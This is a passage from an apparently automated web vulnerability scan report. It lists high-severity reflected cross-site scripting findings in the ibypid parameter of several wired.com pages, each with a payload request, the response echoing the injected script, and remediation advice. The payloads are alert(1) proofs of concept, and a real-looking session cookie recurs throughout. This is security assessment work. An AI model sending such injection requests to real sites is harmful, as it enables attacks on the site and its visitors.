Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:13 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:13 GMT
Date: Sun, 21 Nov 2010 23:14:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 231876;alert(1)//b8b3883cd7f;</script>
...[SNIP]...

1.584. http://www.wired.com/inspiredbyyou/2010/07/must-sees/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/must-sees/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 53f8c%3balert(1)//63f97596e7a was submitted in the ibypid parameter. This input was echoed as 53f8c;alert(1)//63f97596e7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/must-sees/?ibypid=453f8c%3balert(1)//63f97596e7a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:18 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:18 GMT
Date: Sun, 21 Nov 2010 23:14:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 103981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 453f8c;alert(1)//63f97596e7a;</script>
...[SNIP]...

1.585. http://www.wired.com/inspiredbyyou/2010/07/the-list [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/the-list

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 985e3%3balert(1)//29173f1a6e4 was submitted in the ibypid parameter. This input was echoed as 985e3;alert(1)//29173f1a6e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/the-list?ibypid=3985e3%3balert(1)//29173f1a6e4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:17 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:17 GMT
Date: Sun, 21 Nov 2010 23:14:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 3985e3;alert(1)//29173f1a6e4;</script>
...[SNIP]...

1.586. http://www.wired.com/inspiredbyyou/2010/07/tweetcarts [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/tweetcarts

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9281f%3balert(1)//1442148a2f4 was submitted in the ibypid parameter. This input was echoed as 9281f;alert(1)//1442148a2f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/tweetcarts?ibypid=19281f%3balert(1)//1442148a2f4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:09 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=447
Expires: Sun, 21 Nov 2010 23:21:37 GMT
Date: Sun, 21 Nov 2010 23:14:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 19281f;alert(1)//1442148a2f4;</script>
...[SNIP]...

1.587. http://www.wired.com/inspiredbyyou/2010/08/english-japanese-emoticon-translator/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/08/english-japanese-emoticon-translator/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a7a08%3balert(1)//72fe6adb542 was submitted in the ibypid parameter. This input was echoed as a7a08;alert(1)//72fe6adb542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/08/english-japanese-emoticon-translator/?ibypid=6a7a08%3balert(1)//72fe6adb542 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:28 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=446
Expires: Sun, 21 Nov 2010 23:21:55 GMT
Date: Sun, 21 Nov 2010 23:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 6a7a08;alert(1)//72fe6adb542;</script>
...[SNIP]...

1.588. http://www.wired.com/inspiredbyyou/2010/08/top-ten-most-popular-celebrities/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 67c96%3balert(1)//9c87be7eadf was submitted in the ibypid parameter. This input was echoed as 67c96;alert(1)//9c87be7eadf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/?ibypid=767c96%3balert(1)//9c87be7eadf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:24 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:24 GMT
Date: Sun, 21 Nov 2010 23:14:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 767c96;alert(1)//9c87be7eadf;</script>
...[SNIP]...

1.589. http://www.wired.com/inspiredbyyou/2010/09/ascent-of-robot/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/ascent-of-robot/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f56c8%3balert(1)//bb7f19b9979 was submitted in the ibypid parameter. This input was echoed as f56c8;alert(1)//bb7f19b9979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/ascent-of-robot/?ibypid=9f56c8%3balert(1)//bb7f19b9979 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:39 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 9f56c8;alert(1)//bb7f19b9979;</script>
...[SNIP]...

1.590. http://www.wired.com/inspiredbyyou/2010/09/bittorrent-or-box-office/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/bittorrent-or-box-office/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c43e3%3balert(1)//d95607fec28 was submitted in the ibypid parameter. This input was echoed as c43e3;alert(1)//d95607fec28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/bittorrent-or-box-office/?ibypid=11c43e3%3balert(1)//d95607fec28 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=449
Expires: Sun, 21 Nov 2010 23:22:04 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 11c43e3;alert(1)//d95607fec28;</script>
...[SNIP]...

1.591. http://www.wired.com/inspiredbyyou/2010/09/re-animators/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/re-animators/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1b488%3balert(1)//92eb5cb2444 was submitted in the ibypid parameter. This input was echoed as 1b488;alert(1)//92eb5cb2444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/re-animators/?ibypid=101b488%3balert(1)//92eb5cb2444 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=467
Expires: Sun, 21 Nov 2010 23:22:26 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 101b488;alert(1)//92eb5cb2444;</script>
...[SNIP]...

1.592. http://www.wired.com/inspiredbyyou/2010/09/the-molecular-pantry/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/the-molecular-pantry/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8030b%3balert(1)//54f8fbfd62 was submitted in the ibypid parameter. This input was echoed as 8030b;alert(1)//54f8fbfd62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/the-molecular-pantry/?ibypid=88030b%3balert(1)//54f8fbfd62 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:35 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 88030b;alert(1)//54f8fbfd62;</script>
...[SNIP]...

1.593. http://www.wired.com/inspiredbyyou/2010/10/buy-it-or-burn-it [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/buy-it-or-burn-it

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc247%3balert(1)//401a89ca126 was submitted in the ibypid parameter. This input was echoed as dc247;alert(1)//401a89ca126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/buy-it-or-burn-it?ibypid=12dc247%3balert(1)//401a89ca126 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:45 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=438
Expires: Sun, 21 Nov 2010 23:21:03 GMT
Date: Sun, 21 Nov 2010 23:13:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 12dc247;alert(1)//401a89ca126;</script>
...[SNIP]...

1.594. http://www.wired.com/inspiredbyyou/2010/10/peak-everything [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/peak-everything

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 99586%3balert(1)//29128e720c6 was submitted in the ibypid parameter. This input was echoed as 99586;alert(1)//29128e720c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/peak-everything?ibypid=1399586%3balert(1)//29128e720c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:02 GMT
Date: Sun, 21 Nov 2010 23:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 1399586;alert(1)//29128e720c6;</script>
...[SNIP]...

1.595. http://www.wired.com/inspiredbyyou/2010/10/turkeys-and-triumphs [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/turkeys-and-triumphs

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c5cb%3balert(1)//5e37e52b0bb was submitted in the ibypid parameter. This input was echoed as 8c5cb;alert(1)//5e37e52b0bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/turkeys-and-triumphs?ibypid=148c5cb%3balert(1)//5e37e52b0bb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:43 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:43 GMT
Date: Sun, 21 Nov 2010 23:13:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 148c5cb;alert(1)//5e37e52b0bb;</script>
...[SNIP]...

1.596. http://www.wired.com/inspiredbyyou/2010/11/avoiding-bad-holiday-albums [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/11/avoiding-bad-holiday-albums

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc9b9%3balert(1)//3b7177fe795 was submitted in the ibypid parameter. This input was echoed as bc9b9;alert(1)//3b7177fe795 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/11/avoiding-bad-holiday-albums?ibypid=15bc9b9%3balert(1)//3b7177fe795 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:40 GMT
Content-Type: text/html; charset=UTF-8
